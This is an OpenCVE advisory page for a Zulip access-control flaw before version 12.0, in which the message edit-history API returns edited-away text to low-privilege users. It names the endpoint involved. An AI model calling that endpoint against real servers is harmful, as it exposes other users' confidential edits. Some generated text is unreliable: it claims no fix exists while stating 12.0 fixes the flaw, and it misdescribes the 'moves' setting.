Description
Zulip is an open-source team collaboration tool. Prior to 12.0, With message_edit_history_visibility_policy set to "moves", /api/v1/messages/{id}/history still returns historical content values, allowing low-privilege users to recover text that was edited away from other users' messages. This vulnerability is fixed in 12.0.
Published: 2026-05-12
Score: 6 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Zulip allows users to edit messages and configure a policy controlling who can view the edit history. In versions prior to 12.0, setting the policy to "moves" – which should limit visibility to only the user who made the edit – still returns historical content via the /api/v1/messages/{id}/history API endpoint. This flaw permits low‑privilege users to retrieve the original text of messages edited by other users, exposing potentially sensitive or confidential information. The weakness arises from improper authorization controls and is identified as CWE‑284.

Affected Systems

The vulnerability affects Zulip, the open‑source team collaboration tool, in all releases before version 12.0. Systems running any pre‑12.0 build of Zulip are impacted regardless of deployment size or operating environment.

Risk and Exploitability

The CVSS score of 6.0 indicates a medium severity issue. EPSS data is not available, and the vulnerability is not listed in CISA's KEV catalog. Exploitation requires a legitimate Zulip account with at least low privilege, and access to the REST API. An attacker can simply call the /api/v1/messages/{id}/history endpoint for any message ID that a low‑privilege user can view, thereby recovering the edited text of other users’ messages. Given the lack of a high exploitation probability score, the risk is considered moderate, but the confidentiality impact warrants prompt remediation.

Generated by OpenCVE AI on May 12, 2026 at 17:35 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Zulip to version 12.0 or later, where the edit‑history visibility restriction is correctly enforced.
  • If an upgrade is not immediately possible, restrict or remove access to the /api/v1/messages/{id}/history endpoint for non‑administrator users, or disable edit history tracking for low‑privileged roles.
  • Review and tighten Zulip’s role‑based access controls to ensure that only authorized users can view message history and consider disabling the ability for any user to edit others’ messages if it is not a core requirement.

Generated by OpenCVE AI on May 12, 2026 at 17:35 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 12 May 2026 18:00:00 +0000

Type Values Removed Values Added
First Time appeared Zulip
Zulip zulip
Vendors & Products Zulip
Zulip zulip

Tue, 12 May 2026 16:45:00 +0000

Type Values Removed Values Added
Description Zulip is an open-source team collaboration tool. Prior to 12.0, With message_edit_history_visibility_policy set to "moves", /api/v1/messages/{id}/history still returns historical content values, allowing low-privilege users to recover text that was edited away from other users' messages. This vulnerability is fixed in 12.0.
Title Zulip: Message edit history visible in "moves only" policy through /api/v1/messages/{id}/history
Weaknesses CWE-284
References
Metrics cvssV4_0

{'score': 6, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

Zulip Zulip
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-12T16:33:02.829Z

Reserved: 2026-04-10T20:22:44.035Z

Link: CVE-2026-40300

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Received

Published: 2026-05-12T17:16:20.150

Modified: 2026-05-12T17:16:20.150

Link: CVE-2026-40300

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-12T17:45:20Z

Weaknesses